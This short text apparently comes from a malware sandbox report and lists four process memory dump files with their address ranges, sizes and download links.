memory/1000-86-0x0000000003340000-0x0000000003341000-memory.dmp

Filesize
4KB

Download
memory/1000-113-0x0000000003340000-0x0000000003341000-memory.dmp

Filesize
4KB

Download
memory/1000-112-0x0000000003340000-0x0000000003341000-memory.dmp

Filesize
4KB

Download
memory/1836-22-0x0000000000400000-0x0000000000554000-memory.dmp

Filesize
1.3MB

Download